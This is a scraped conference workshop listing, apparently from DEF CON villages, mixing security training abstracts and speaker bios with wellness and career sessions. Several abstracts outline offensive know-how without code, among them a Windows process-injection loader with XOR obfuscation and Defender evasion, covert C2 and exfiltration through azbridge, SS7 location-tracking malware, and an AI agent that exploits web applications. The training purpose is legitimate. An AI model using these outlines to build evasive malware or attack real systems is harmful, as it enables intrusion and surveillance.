Creator Workshops List

This series of self-guided labs will introduce even the most novice hacker to the world of embedded device firmware and software exploitation. First-come first-served, don’t miss a chance try out these labs and get started with embedded device hacking.

If you’ve never popped open an embedded device and tried to get a simple shell, this is the lab for you. This is a first-come first-served workshop where you can walk through the step by step instructions to finding and connecting to a debug interface on an embedded device.

As vulnerabilities are discovered and security patches are applied, the structure of the Chrome V8 Engine and its internal sandbox continues to evolve and become increasingly complex. In this fast-changing environment, finding and exploiting potential vulnerabilities in V8 requires an understanding of its architecture, as well as analysis and exploitation techniques.

In this workshop, we will share the detailed exploitation steps for beginners who have no prior experience with Chrome V8 exploits. It will be an opportunity to learn how to explore bugs using GDB, the d8 debugger and develop exploitation code.

This workshop is designed for beginners, and we will provide VDI environments for hands-on practice. You can join freely with just your personal laptop and no setup required. Take this opportunity to experience Chrome V8 exploitation firsthand!

Hoseok Lee is the team leader of EQSTLab at SK Shieldus and serves as Executive Manager at the Ransomware Response Center under the Korean Anti-Ransomware Alliance (KARA). He specializes in researching emerging security vulnerabilities and analyzing cybersecurity trends. Through numerous presentations on cyber threat intelligence and ransomware developments, he has demonstrated broad expertise in the field of cybersecurity. Under his leadership, EQSTLab conducts comprehensive analyses of security threats across various domains including AI LLMs, IoT, and cloud environments. Based on these findings, the team develops practical penetration testing and vulnerability analysis guides that can be directly applied in the field. These resources are freely available on the official website for security professionals worldwide.

Hyaesun Ji is the Project Leader of the EQSTLab at SK Shieldus, specializing in the identification and analysis of cutting-edge security vulnerabilities and emerging cybersecurity threats. She actively leads research projects focused on driving innovation and enhancing the organization’s overall security posture, significantly contributing to stronger threat mitigation and cyber resilience.

I conduct CVE vulnerability analyses, produce technical reports to deliver security intelligence based on my findings, and research the latest vulnerability trends.

Taeeun Lee is the Security Researcher of the EQSTLab at SK Shieldus. He is deeply involved in researching software and platform vulnerabilities, focusing on identifying security flaws and analyzing potential exploits. Before diving into the inner workings of the V8 engine, he specialized in investigating and securing CMS platforms as well as Electron-based applications, during which he uncovered and documented several vulnerabilities that were later assigned CVEs. He continually keeps abreast of evolving cyber threats and security trends, reflecting a strong commitment to protecting systems and data through ongoing research and expertise development.

Manager and Security Researcher at EQST Lab, SK shieldus, specializing in web security, pwnable challenges, and JavaScript engine exploitation. Develops professional technical training resources based on in-depth research into V8 internals, JIT vulnerabilities, and modern browser exploitation methods.

Come explore the world of Traditional Chinese Medicine while we tap into our inner body wisdom and innate ability to heal ourselves. Take a journey through chi, the principles of yin and yang, the 5 elements theory and the energetic meridian system of the body.

We will flow through a meridian percussion exercise to wake up our meridians and learn how they flow. To finish the workshop, we will learn self-acupressure techniques and how to locate and stimulate potent acupressure points for vitality.

Workshop for all fitness levels. Join us for a daily wellness workshop to end your day, take time to recenter and restore yourself after your adventures at DEF CON.

This workshop is inclusive of all bodies. EveryBODY is Welcome here.

Hi, I’m Megan Allen.

My work focuses on a holistic approach to health; moving the body’s natural energy into alignment with Earth and the seven chakras. I practice integrative wellness – honoring a person’s emotional, mental, physical and spiritual well-being. I provide intuitive healing sessions and work with clients to relax the mind, increase body awareness and balance energy flow.

I also facilitate community wellness workshops, ceremonies and transformational group programs inviting participants to disconnect from their busy lives, turn inward and tap into the present to restore and maintain the body’s energetic balance and cultivate self-love, empowerment and sovereignty.

I inspire people to activate their highest potential in alignment with their wise hearts and to promote healing from within. I tailor my sessions to reflect this; using techniques from my healing disciplines as well as my love for Traditional Chinese Medicine, holistic aromatherapy, crystals and essential oils, tarot, animal medicine cards and a deep reverence for nature.

Nature is one of my greatest teachers. It constantly teaches me about grounding, stability, resilience, boundaries, growth, and stillness.

Attendees sit down with real-world threat intelligence and walk through the process of analyzing a threat actor, identifying relevant TTPs, and creating a red team emulation plan using ATT&CK Navigator. By the end, they’ll have a completed adversary worksheet and a mini playbook for red team usage.

Fredrik Sandström, M.Sc. is Head of Cyber Security at Basalt, based in Stockholm, Sweden. He has nearly a decade of experience in penetration testing, alongside a background in software development and embedded systems engineering. His early work includes software development for organizations such as the Swedish Defence Research Agency (FOI).

Since 2015, Fredrik has focused on delivering advanced security assessments—including penetration testing, red teaming, and threat emulation—for clients in diverse sectors such as banking, insurance, automotive, energy, communications, and IT services. He holds multiple industry-recognized certifications, including GXPN (GIAC Exploit Researcher and Advanced Penetration Tester), GCPN (GIAC Cloud Penetration Tester), GRTP (GIAC Red Team Professional), and HTB Certified Bug Bounty Hunter (CBBH).

Fredrik is also an active contributor to the security community. He has presented at major conferences such as SEC-T—Sweden’s leading offensive security conference—and DevCon in Bucharest, Romania, a key event for developers and IT professionals in Eastern Europe.

In this session, we’ll take a deep dive into the future of web security through the lens of ethical hacking and artificial intelligence. Attendees will have the opportunity to see AI in action through a live demo, where we will demonstrate how AI can identify and resolve security flaws in web applications. The session will feature real-time security testing using AI-powered tools, illustrating how these technologies give ethical hackers an edge in the fight against malicious attacks.

As an ethical hacker and security expert, Ilkin Javadov has made significant contributions to the cybersecurity community. A frequent speaker at world-renowned cyber conferences such as GISEC 2023-2024, DEFCON 31 Red Team Village 2023-2024, and InCyber Forum Canada 2023-2024, Ilkin shares valuable insights into the latest cyberthreats and defense strategies. Notably, Ilkin is one of the elite 20 hackers who ethically infiltrated the German Armed Forces (Bundeswehr) earning a place in their Hall of Fame and receiving a prestigious medal from a General in recognition of exceptional contributions to national security. With extensive experience in ethical hacking and cybersecurity, Ilkin continues to advance the field by mentoring and educating the next generation of security professionals.

Students receive exposure to the law side of cryptocurrency business, including certification, regulation, government policy, and risk assessment. Regulators around the world evaluate and implement diverse regulations governing the use and applications of Blockchain reflecting varying degrees of acceptance ranging from blanket prohibition to highly facilitating frameworks. Organisations, in turn, assess the related risks and legal challenges. This workshop considers emerging trends and security essentials vital for business and financial businesses, providing a brief overview of AML and KYC and suggestions to increase security and decrease risk exposure.

Chelsea is a lawyer specializing in consumer finance, data and technology. She advises clients on updates in the law and defends them in litigation. She is a cryptocurrency advocate, with multiple professional publications.

Chakras are the energy centers in your body where energy flows. These energy centers are directly linked to mental, physical, emotional and spiritual attributes and well-being. Chakras are constantly in flux and can be imbalanced by becoming underactive or overactive and our being as a whole becomes imbalanced often leading to dis-ease and/or emotional blocks that disrupt our internal environment and harmony.

During this workshop, we will explore each chakra from the root up to the crown through their attributes, color, element, mantra, affirmation, crystals and essential oils.

Then, we will drop into our physical and energetic bodies in a Reiki infused guided, grounding and clearing chakra meditation for a journey of deep relaxation, Earth connection and energy restoration.

This workshop is inclusive of all bodies. EveryBODY is Welcome here.

Hi, I’m Megan Allen.

My work focuses on a holistic approach to health; moving the body’s natural energy into alignment with Earth and the seven chakras. I practice integrative wellness – honoring a person’s emotional, mental, physical and spiritual well-being. I provide intuitive healing sessions and work with clients to relax the mind, increase body awareness and balance energy flow.

I also facilitate community wellness workshops, ceremonies and transformational group programs inviting participants to disconnect from their busy lives, turn inward and tap into the present to restore and maintain the body’s energetic balance and cultivate self-love, empowerment and sovereignty.

I inspire people to activate their highest potential in alignment with their wise hearts and to promote healing from within. I tailor my sessions to reflect this; using techniques from my healing disciplines as well as my love for Traditional Chinese Medicine, holistic aromatherapy, crystals and essential oils, tarot, animal medicine cards and a deep reverence for nature.

Nature is one of my greatest teachers. It constantly teaches me about grounding, stability, resilience, boundaries, growth, and stillness.

Using an electronic circuit camera, we zoom in on cryptosecure devices and their circuits. Descriptions of existing cryptocurrency hardware lead to consideration of future integrations in the physical world and how secure elements work. We pass around a showcase of half a dozen wallets and similar hardware, as well as Nitrokeys (for defence) and ChipWhisperers (for attack.) We get set up with a set of hardware development software tools, and consider the physical production workflow that top manufacturers follow in high security areas.

Param is an Electrical Engineering Student from Georgia Tech with a strong passion for and interest in crypto. Although he primarily got interested in cryptography and hardware security through a class at Georgia Tech, he is also working at a software company on crypto adoption and ease of use. With a unique blend of HW and SW skills, Param is truly enthusiastic about all aspects of crypto.

Michael Schloh von Bennewitz (MSvB) is a computer scientist specializing in cryptosecure electronics and embedded development. He is the founder of Monero Devices and responsible for research, development, and maintenance of Opensource software repositories. A prolific speaker in four languages, Michael presents at technical meetings every year.

Modern attackers aren’t waiting for CVEs. They’re quietly mapping your apps and APIs, uncovering unintended exposures, and slipping past defenses.

Don’t just react, anticipate. This workshop pulls back the curtain on the modern attacker’s playbook. You’ll learn how adversaries extract intelligence from exposed metadata clues hiding in plain sight. Then, we’ll dive into crafting stealthy, context-aware payloads designed to bypass detection and exploit subtle implementation flaws. Through real-world examples and guided exercises, you’ll learn to identify these patterns, recognize evasions, and build resilient detection and prevention strategies.

Takeaways: Early-stage recon via api access, information disclosure through common hardening State of the art evasion techniques with our free, open-source tool Obfuskit Normalization and encoding and adversarial techniques to subvert pathing, routing, and authentication Step up your defensive game against these attacks

Roshan Piyush leads Security Research at Traceable by Harness, where he also oversees Aspen Labs — Harness’s dedicated initiative for advancing modern application and API security. He is at the forefront of developing next-generation security platforms that deliver deep protection across the software lifecycle, from code to runtime.

With over a decade of experience in cybersecurity and a recent focus on API security, Roshan researches cutting-edge detection and prevention techniques across CI/CD pipelines, software supply chains, runtime environments, and cloud-native architectures. His work powers enterprise-grade security solutions that help organizations stay ahead of evolving threats.

An active contributor to the open-source security community, Roshan has been involved with projects like OWASP crAPI and Coraza WAF. He frequently shares his insights through technical talks, tools, and collaborations, helping drive progress across the broader AppSec ecosystem.

I’m Soujanya Namburi, a Developer and Security Research Engineer. I specialize in WAF (Web Application Firewalls), anomaly detection, external surface scanners, and active security testing. I have extensive experience with open source security projects like OWASP Coraza, OWASP Coreruleset, and OWASP Crapi. I’m passionate about building secure, high-performance solutions and contributing to open-source projects that help organizations strengthen their security posture.

“Ask a Hiring Manager” is an interactive group workshop designed to give job seekers and professionals direct access to seasoned hiring managers across various cybersecurity roles. Whether you’re a recent graduate, transitioning from another field, or already working in security and exploring what’s next, this is your chance to get unfiltered answers to the questions that matter most.

With over 20 years of experience in IT, security, and development, Cory Wolff leads the offensive security practice at risk3sixty, a consulting firm based in Atlanta, GA. He holds multiple certifications, including the Offensive Security Certified Professional (OSCP) and the Certified Information Systems Security Professional (CISSP), and has a proven track record of building and breaking various technologies since his first computer in 1988.

Cory also contributes to the cybersecurity community as a core team member of Red Team Village, a platform that fosters collaboration, learning, and innovation among red teamers and security professionals.

“Ask a Hiring Manager” is an interactive group workshop designed to give job seekers and professionals direct access to seasoned hiring managers across various cybersecurity roles. Whether you’re a recent graduate, transitioning from another field, or already working in security and exploring what’s next, this is your chance to get unfiltered answers to the questions that matter most.

Team and people builder for over 20 years, primarily in the offensive security space.

“Ask a Hiring Manager” is an interactive group workshop designed to give job seekers and professionals direct access to seasoned hiring managers across various cybersecurity roles. Whether you’re a recent graduate, transitioning from another field, or already working in security and exploring what’s next, this is your chance to get unfiltered answers to the questions that matter most.

“Ask a Hiring Manager” is an interactive group workshop designed to give job seekers and professionals direct access to seasoned hiring managers across various cybersecurity roles. Whether you’re a recent graduate, transitioning from another field, or already working in security and exploring what’s next, this is your chance to get unfiltered answers to the questions that matter most.

Backdoors and Breaches es un taller interactivo y altamente práctico que utiliza un juego de cartas diseñado específicamente para entrenar a equipos de seguridad en la identificación, análisis y respuesta ante incidentes cibernéticos. Este taller va mucho más allá de la teoría, permitiendo a los participantes experimentar situaciones realistas de ciberataques en un entorno controlado, colaborativo y, sobre todo, didáctico.x000D x000D Durante la sesión, los participantes trabajarán en equipo para resolver incidentes simulados. Cada carta representa un elemento clave de la cadena de ataque: desde el compromiso inicial, persistencia, escalada de privilegios y movimiento lateral, hasta la comunicación con servidores de comando y control (C2) y la exfiltración de datos. También se incluyen cartas de “injects” que añaden complicaciones inesperadas, y “procedures” que permiten emplear técnicas y recursos defensivos. Esto obliga a los jugadores a pensar estratégicamente, adaptarse y tomar decisiones rápidas, simulando la presión y la incertidumbre que acompañan los incidentes en la vida real.x000D x000D El taller inicia con una breve explicación del juego y sus categorías de cartas, seguida de la presentación de un escenario que los equipos deberán investigar y resolver. A lo largo del ejercicio, los participantes lanzarán dados para determinar el éxito o fracaso de acciones clave, aprendiendo a interpretar probabilidades, planificar respuestas y trabajar con recursos limitados. Además, cada paso del juego será comentado y relacionado con técnicas reales de respuesta ante incidentes, controles de seguridad, y procesos de detección y mitigación utilizados en entornos profesionales.x000D x000D El objetivo principal de este taller es fortalecer la capacidad de análisis, colaboración y toma de decisiones bajo presión. Los asistentes no solo aprenderán a detectar vectores de ataque, sino también a emplear herramientas forenses, aplicar medidas de contención y erradicación, y comunicar de forma efectiva sus hallazgos y acciones. La sesión está pensada tanto para equipos SOC, analistas de seguridad, estudiantes y profesionales de ciberseguridad, como para cualquier persona interesada en mejorar sus habilidades prácticas de respuesta a incidentes.x000D x000D Al final del taller, los participantes habrán desarrollado confianza en su capacidad para enfrentar incidentes reales, comprendido la importancia del trabajo en equipo y habrán vivido de primera mano cómo las pequeñas decisiones pueden tener un gran impacto en la seguridad de una organización.x000D x000D https://www.blackhillsinfosec.com/tools/backdoorsandbreaches/

Nikolas Behar is an esteemed Red Team leader and consultant with a rich history in cybersecurity, having previously held roles at Deloitte, Accenture, and PwC. His expertise lies in red teaming and threat intelligence, where he excels in integrating complex offensive security strategies. Behar has significantly enhanced detection capabilities and operational efficiency in his roles, and his innovative approach to reporting has improved stakeholder comprehension. His practical experience with MITRE TIDs and utilizing open-source intelligence from entities like US-CERT and FR-CERT underscores his deep connection to the current cybersecurity landscape.x000D x000D Holding an MSc in Information Security from the University of London, Behar is also a seasoned educator in cybersecurity, teaching at multiple universities. His ability to distill complex concepts and engage diverse audiences has been showcased across various platforms, including prestigious conferences like Fal.con, BSides, and the InfoSecurity Magazine Summit. Dedicated to advancing the field, Behar leads research into emerging threats, develops cutting-edge tools, and mentors future cybersecurity professionals, reflecting his commitment to the community and continuous learning.

This session will walk the participants through the tenants of threat emulation culminating in them emulating a threat actor of their choice.

This workshop will give participants a chance to get hands on with threat emulation by covering: How To Define The Threat: What is likely and what are we afraid of?

Gather Intel: Is there any historic reporting of said threat? Students will research a threat actor and gather actionable Behaviors. Capability Development: We will use that intel gathered to engineer a threat emulation scenario to fit our needs using modern frameworks, scripts, payloads, and even customizing our delivery infrastructure.

Put It To Work: You will get a chance to test your threat against a live environment.

Trey Bilbrey is the Lead of SCYTHE Labs, specializing in Purple Team Exercises, Threat Emulation, Critical Infrastructure, and holistic cyber operations. Trey’s 15+ years of industry experience has allowed him to become an excellent educator, defender of networks, and a cultivator of cybersecurity professionals. Prior to joining SCYTHE, Trey held positions at notable organizations such as Hack The Box (HTB Academy content Developer), The Army Corps of Engineers (ICS/SCADA Penetration Testing), and a veteran of the United States Marine Corps (Defensive and Offensive Cyber Operations). Current certifications include the CISSP, GICSP, GCIP, and K>FiveFour RTAC.

No one can deny that the job of a bug bounty hunter is tedious at times. The goal of this talk is simple: to make you a more efficient hacker using Caido. There is a lot to cover, but you can expect content surrounding the following: AI integration, collaboration, automation (JIT and otherwise), efficient navigation, and a slew of new Caido features. Caido is a rapidly evolving tool – consider this your crash course on getting back up to speed.

I’m a full-time Bug Bounty Hunter and Host of the Critical Thinking – Bug Bounty Podcast. I also work as an Advisor for Caido (HTTP Proxy). When I’m not putting in reports or disseminating technical info on the pod, I’m normally spending time with my wife and 2 daughters, lifting heavy things, playing volleyball, or getting folded in BJJ

This will be a hands-on workshop, taking a few hours, that will require a laptop along with a Type II Hypervisor that dives into the practical application of the MITRE ATT&CK framework, emphasizing its value beyond simple enumeration of adversary tactics. By using ATT&CK to conduct practical exercises, organizations can better understand their threat landscape and take proactive measures to mitigate vulnerabilities. The hands-on workshop and discussion involves analyzing attacks by industry, drawing connections to real-world scenarios, and incorporating simulations to enhance risk management strategies. How do you prepare for an attack? When do you take real data to formulate an attack scenario. How do you test that plan?

A significant focus is placed on utilizing the MITRE Caldera tool for simulating and analyzing attack scenarios in specific environments. The tool provides insights into adversary tactics, allowing organizations to evaluate their defenses, detection capabilities, and mitigation strategies effectively.

Join us for a guided walkthrough of the Blacks in Cybersecurity Village (BIC) badge from DEF CON 33, led by the badge’s developer. This session explores the PCB design, embedded circuits that power the badge, and how this year’s design supports Shitty Add-Ons (SAOs). New to DEF CON? You’ll also get an introduction to the history of BIC badges and how they fit into the broader culture of DEF CON badge collecting. All experience levels are welcome to join and explore.

Eli McRae is a loser who doesn’t know nothing about how to computer… That doesn’t stop him though. He does hacking and hacking-related activities for the Arkansas Air National Guard and private sector. He is a founding member of the statewide Arkansas Hackers crew and has worked as an educator and technical trainer. He currently works as a pentester for a global MSSP.

This started off as a basic project I taught in Ukraine last year with Hackers arise. It has evolved onto an updated 32 bit system with MXLinux from Ubuntu. Although a big pain in the ass; we also updated to python3 finally in this version as well.

• Lessons 1-2 covering stack basics: Finding elements of the stack including EBP,ESP, RETURN, ARG1,ARG2. Elements we need to understand in a stack overflow exploitation. We also cover how elements are copied onto the stack and how to find them.
• Lesson 3: Building off previous two classes we now play a game to overwrite a variable on the stack. This prepares us for stack based overflows.
• Lesson 4: Vanilla buffer overflow!
• Lesson 5: Vanilla buffer overflow with a small buffer to demonstrate there are other places to store payloads.
• Lesson 6: Bypassing Data execution prevention (DEP/NX) using Return oriented programming
• Lesson 7: Explanation and demo of bypassing Stack cookies
• Lesson 8: bypassing DEP and ASLR together
• Lesson 9: Return oriented programming

The Device Lab is highly-collaborative environment where security researchers test medical instruments, applications, and devices in real-time from participating Medical Device Manufacturers. Any potential issues are reported directly to the manufacturer, and coordinated vulnerability disclosures are produced.

As part of their product security programs, their proactive initiatives to test their products, and to enhance the cybersecurity of their medical technologies, select medical device makers are teaming up with the Biohacking Village.

These manufacturers are inviting security researchers to learn and to test their products in dedicated spaces set aside for them. Their staff will answer questions, educate researchers, and triage any potential security issues. Researchers who perform testing should expect to follow the manufacturers’ published coordinated vulnerability disclosure policy and report any potential issues found so they can be addressed. Security researchers must sign the Hippocratic Oath for Hackers and agree to the framework of boundaries and rules of engagement during and post conference engagement.

This workshop demonstrates how SS7 signaling can be intercepted and manipulated to retrieve a mobile user’s location without user interaction using custom-developed malware. Additionally, it demonstrates how the GTPdoor malware creates a hidden backdoor by abusing GTP signaling in roaming networks.

In this hands-on 2-hour workshop, we will explore the fascinating and evolving world of Web Application Firewall (WAF) bypassing—a critical topic for penetration testers, red teamers, and security engineers.

Participants will be introduced to the fundamentals of WAFs, including how modern systems detect and block potentially malicious requests. We’ll then dive into a range of realistic evasion techniques used to sneak past WAF protections and interact with protected applications.

We have exposed critical offensive capabilities in the azbridge tool, which has been available in Microsoft Azure’s GitHub repository since 2018. This tool is a legitimate utility connecting network-isolated assets. Our research demonstrates how an attacker can weaponize this tool using its default configuration.

azbridge supports attackers in establishing covert C2 channels, exfiltrating data, and enabling lateral movement while evading scrutiny by perimeter defenses. It leverages back-end services that serve Azure Relay endpoints (*.servicebus.windows.net) and encapsulates malicious traffic in TLS-encrypted connections to *.cloudapp.azure.com endpoints, defeating egress filtering and proxy inspection.

We demonstrate how attackers can use it to maintain persistent network access, bypass network security controls, and conduct post-exploitation using Microsoft’s tool. More sophisticated adversaries can re-implement the functionality of this tool in their tradecraft (e.g., implants). For our defensive side friends, we provide initial recommendations on recognizing these techniques to defend against adversaries exploiting legitimate infrastructure.

While not a 0-day, as of 03/14/2025, there are no reports of adversaries using azbridge, and no researchers have reported this tool’s potential for abuse. Therefore, we believe it is a novel use case or at least one that has not been publicly discussed.

Edward is a red teamer and former offensive security consultant focused on adversary simulation, malware development, and social engineering. He works on bypassing security controls, evading detection, and testing the limits of modern defenses. When he’s not on an engagement, he’s refining techniques, building tools, and keeping up with the ever-changing security landscape.

Josh

Josh is an offensive security professional with more than 10 years in Information Security. He has an Associate’s Degree in Computer Forensics and Security, as well as several certifications. He began his professional career in IT as a contractor for the US Army Corps of Engineers before moving to his current company where he has held roles both on the defensive and offensive sides of security.

When not in the office Josh satisfies his curiosity exploring Red Team Infrastructure and Open Source Intelligence. He is a husband, father of two, and enjoys playing multiple instruments. Want an OSINT challenge – see if you can find his account for live streaming music.

Currently Josh is Senior Red Team Operator at a fortune 50 insurance company.

Robert is a seasoned offensive security professional with more than a decade of experience in Information Security. He started his career in the U.S. Marine Corps, working on secure telecommunications. Robert holds a master’s degree in Cybersecurity, numerous IT certifications, and a background as an instructor at higher education institutions like the New Jersey Institute of Technology and American University.

Robert is committed to sharing his knowledge and experiences for the benefit of others. He enjoys Brazilian steakhouses and cuddling with his pugs while writing Infrastructure as Code to automate Red Team Infrastructure.

Robert currently serves as a Red Team Lead at Humana, Inc.

Want to build a Security Champion program that doesn’t fizzle after launch? This 2-hour hands-on workshop will guide you through designing a practical, sustainable champion program tailored to your culture, org structure, and resourcing realities. Whether you’re just getting started or trying to fix a stalled initiative, this session will equip you with the tools to define your vision, shape meaningful goals, and map out your first cohort – all with a firm grounding in culture-building, metrics, and action-oriented design. Participants will work through a collaborative workbook with activities focused on champion behaviors, stakeholder alignment, motivational techniques, and training plans. You’ll leave with a solid program blueprint, practical takeaways, and inspiration to rally allies across Engineering, Application Security, and Leadership. If you believe developers are on the front lines of security, and want to do more than “raise awareness,” this is your workshop.

Tanya Janca, aka SheHacksPurple, is the best-selling author of ‘Alice and Bob Learn Secure Coding’, ‘Alice and Bob Learn Application Security’ and the ‘AppSec Antics’ card game. Over her 28-year IT career she has won countless awards (including OWASP Lifetime Distinguished Member and Hacker of the Year), spoken all over the planet, and is a prolific blogger. Tanya has trained thousands of software developers and IT security professionals, via her online academies (We Hack Purple and Semgrep Academy), and her live training programs. Having performed counter-terrorism, led security for the 52nd Canadian general election, developed or secured countless applications, Tanya Janca is widely considered an international authority on the security of software. Tanya currently works at Semgrep as a Security Advocate.

Stanley is a start-up founder and organizational culture expert focused on bridging the gap between security and software engineering. At Katilyst, he designs scalable enablement programs that empower developers to lead with security in mind, from threat modeling to vulnerability management. Stanley specializes in building Security Champion programs that don’t just raise awareness, but drive ownership, behavior change, and long-term impact. He’s passionate about demystifying security, making it actionable, and equipping teams to move fast and build securely.

[Overview]

Malware analysis often focuses on detonation, leaving new defenders and red‑teamers wondering how a loader is actually assembled. In this accelerated, beginner‑friendly, two‑hour hands‑on workshop, participants start with a ready‑to‑build Visual Studio solution and finish with a fully functional Windows 11 process‑injection loader written in C. We focus on the classic three‑call technique: VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread, plus a quick single‑byte XOR obfuscation pass and file bloating operation. All workshop time is devoted to getting a working loader, testing it against Windows Defender, and understanding each step well enough to particpants can expand beyond it.

[Course Outline]

1. Environment Jump-Start 0.1 Cover Windows 11 snapshot with tools and skeleton code. 0.2 Confirm build of Loader.sln.

2. Loader Fundamentals 1.1 Loader vs payload overview 1.2 Memory layout and why VirtualAllocEx / WriteProcessMemory / CreateRemoteThread works.

3. Hands-On Build 2.1 VirtualAllocEx – reserve RWX in target. 2.2 WriteProcessMemory – copy shellcode. 2.3 CreateRemoteThread – execute and watch notepad.exe execute. 2.4 Breakpoint demo in x64dbg.

4. Evasion 3.1 Wrap shellcode in XOR decoder stub. 3.2 Bloat file with appneded null bytes. 3.3 Show Defender detection before and after.

5. Wrap-Up and Next Steps 4.1 Provide code branches: indirect-syscalls, AMSI-bypass 4.2 Safe research and legal reminders 4.3 Recommended reading links

Malware developer and vulnerability researcher with a focus on red team tooling. A purveyor of CTFs and watcher of shellcode pop, they enjoy crafting PoCs and designing CTF challenges for the community. Their current research explores Windows malware development, covert communication channels, and fuzzing techniques.

This session will walk you through bypassing mobile app security protections like root detection and SSL pinning using tools like Frida and apktool. It covers both static patching and dynamic code instrumentation to help you manipulate app behavior for testing and analysis.

Grigoris is a Senior Training Developer at Hack The Box. He is passionate about Mobile Security and creating innovative content for cybersecurity Training. In addition to his role, Grigoris also teaches Mobile Application Security at the University of Piraeus. He graduated with an M.Sc. degree in Digital Systems Security, and he holds a B.Sc. in Computer Science with a specialization in Software Development. Grigoris has previously worked as a Penetration Tester, and he has been one of the founders and a core member of the cybersecurity research group INSSec at the University of West Attica since 2019.

(DCNextGen is for youth 8-18 attending DEF CON) Unlock hidden messages and become a Cipher Sleuth! This session steps through a series of ciphers, all based on strips of letters. Starting with ROT13, we progress through the Caesar cipher, the Vigenère cipher, and finally the US military’s competitor to the Enigma machine, the M138A. We exploit the weaknesses of early ciphers and see how to fix them, so you’re secret messages stay secret!

Bradán graduated third grade with a degree in crayon. This, combined with his unwavering belief in “how difficult could it be”, has made him eminently qualified to wash dishes. His background in UX Designer & User Research and as a purveyor of personas demonstrates his profound talent for making stuff up with confidence. Bradán pre-dates the internet and ARPANET.

Vamos apresentar técnicas forenses de recuperação de dados para dispositivos móveis como ISP CHIPOFF e métodos eletrônicos para acesso aos dados

Leandro Morales Baier Stefano é especialista em perícia forense digital com mais de 20 anos de experiência. CEO da STWBrasil, atua em investigação de fraudes e cibersegurança, com colaboração ativa junto a ministérios públicos e delegacias especializadas. É coordenador de laboratório privado de extração de dados móveis e professor na Academia Forense Digital. Possui formação em segurança da informação, administração e diversas pós-graduações em direito e ciências forenses. Certificado por empresas como Cellebrite e Cisco, é membro de associações forenses nacionais e internacionais, com mais de 200 atuações como perito judicial. Também apoia a ONG Marias da Internet no combate a crimes digitais contra mulheres.

Containers aren’t tiny fortresses. They’re leaky rowboats unless you know what you’re doing. This hands-on workshop demystifies container security layer by layer, showing how real-world missteps in runtime, image, and host configurations open doors to escapes, persistence, and lateral movement. We’ll dissect how containers actually work, walk through common isolation failures, and demonstrate how attackers exploit weak assumptions. Whether you’re building, securing, or regulating containerized apps, you’ll leave with a threat model, practical tools, and maybe a new trick or two for literally popping out of the box.

Natalie is a principal solutions engineer at Chainguard serving the public sector market. She spent years designing, building, and leading complex systems in regulated environments at a major systems integrator, but has also taken her career in many other directions – including detours into project management, systems engineering, and teaching.

She’s passionate about diversity in technology and empowering engineers to build better.

Privacy isn’t straightforward—yet it’s essential for systems and security. In this hands-on workshop, we’ll unpack the contextual layers of privacy through a gamified exercise to reveal the awkward realities of privacy choices. We’ll map key privacy threat categories with animal memes, explore lightweight threat modeling techniques for security and privacy, and apply these insights using the LINDDUN GO framework. You’ll leave with practical skills to tackle privacy risks head-on.

AviD is a prominent security architect and developer, with decades of experience building secure products and protecting complex systems. He has been designing, developing, and testing secure applications for over 20 years, and is obsessed with maximizing value output from security efforts, threat modeling in particular.

At Bounce Security, Avi supports organizations of all sizes with incorporating security into their development workflows, often providing training on secure coding and other security topics. He is also a frequent speaker and trainer at security conferences and developer conferences, and has trained thousands of developers on security.

AviD is a member of the OWASP Board of Directors, a leader of the OWASP Israel chapter, and co-founded the OWASP Threat Modeling project. He is also a community moderator on https://Security.StackExchange.com/. Avi also co-authored the Threat Modeling Manifesto https://www.threatmodelingmanifesto.org/.

Dr. Kim Wuyts is a leading privacy engineer with over 15 years of experience in security and privacy. Before joining PwC Belgium as Manager Cyber & Privacy, Kim was a senior researcher at KU Leuven where she led the development and extension of LINDDUN, a popular privacy threat modeling framework. Her mission is to raise privacy awareness and get organizations to embrace privacy engineering best practices. She is a guest lecturer, experienced speaker, and invited keynote at international privacy and security conferences such as OWASP Global AppSec, RSA, Troopers, CPDP, and IAPP DPC. In the last few years, Kim has been delivering privacy awareness and privacy threat modeling training at many events, including academic guest lectures and corporate training.

Kim is also a co-author of the Threat Modeling Manifesto+Capabilities, program co-chair of the International Workshop on Privacy Engineering (IWPE), and a member of ENISA’s working group on Data Protection Engineering.

Mobile Device Management (MDM) is designed to harden enterprise devices, but what happens when security testing needs to inspect runtime behavior on these same locked devices? This workshop dives deep into bypassing typical MDM-imposed restrictions to perform dynamic runtime API testing on apps that rely heavily on MDM policies. We’ll dissect real-world use cases where traditional testing tools fail and walk through the Appknox approach for injecting custom instrumentation and intercepting APIs in live environments, without root, jailbreak, or MDM tampering. Attendees will learn practical methods to inspect API calls, simulate dynamic inputs, and reverse-engineer mobile apps at runtime, even when locked inside the MDM “vault.”

Subho Halder is the CEO and Co-founder of Appknox, a leading mobile application security platform trusted by 500+ global enterprises. A security researcher turned product leader, he previously worked with Hewlett-Packard and has been listed in Facebook, Google, and Twitter’s Hall of Fame for responsible vulnerability disclosures. Subho specializes in mobile app security, reverse engineering, and kernel exploitation. He has presented at Black Hat and OWASP amongst other industry leading events. At DEFCON, he’s bringing his deep expertise to explore what it takes to test apps on enterprise-locked devices, without breaking policy.

—

Subho Halder is the Co-founder and CEO of Appknox, where he leads advanced research in mobile application security.

He’s spent over a decade deep in offensive security, with a focus on mobile kernel exploitation, runtime evasion, and real-world bypasses for things like RASP and root detection. Subho has shared his work at top conferences including Black Hat, Nullcon, OWASP Global AppSec, and Syscan, often blending hardcore technical research with practical attack demos.

At Appknox, Subho has helped protect more than 500 enterprise apps by embedding mobile security into CI/CD workflows and using real-device testing over emulators. His work has been instrumental in helping organizations in fintech, retail, and aviation catch what traditional tools miss.

By day, he runs a fast-growing SaaS security company. By night, he’s still reverse engineering mobile stacks and building tools that push the boundaries of what’s possible in appsec.

AI 🤖 is being discussed in pretty much all presentations out there. So, what is different about this session? This is a completely hands-on workshop where we will explore cutting edge agentic frameworks through the creation of an AI agent designed to hack web applications 🌐. You will learn how to develop a modular AI agent capable of performing reconnaissance, vulnerability scanning, and exploiting a web application. We will cover an overview of current AI techniques applicable to red team operations through live demonstrations and interactive exercises.

🚀 Join Omar Santos at DEF CON’s Red Team Village to explore how the fusion of AI and red teaming not only redefines the landscape of cyber offensive operations, but also sets the stage for pioneering defensive countermeasures .

🛡️ This workshop promises to equip you with both the knowledge and practical skills to leverage AI in red team operations.

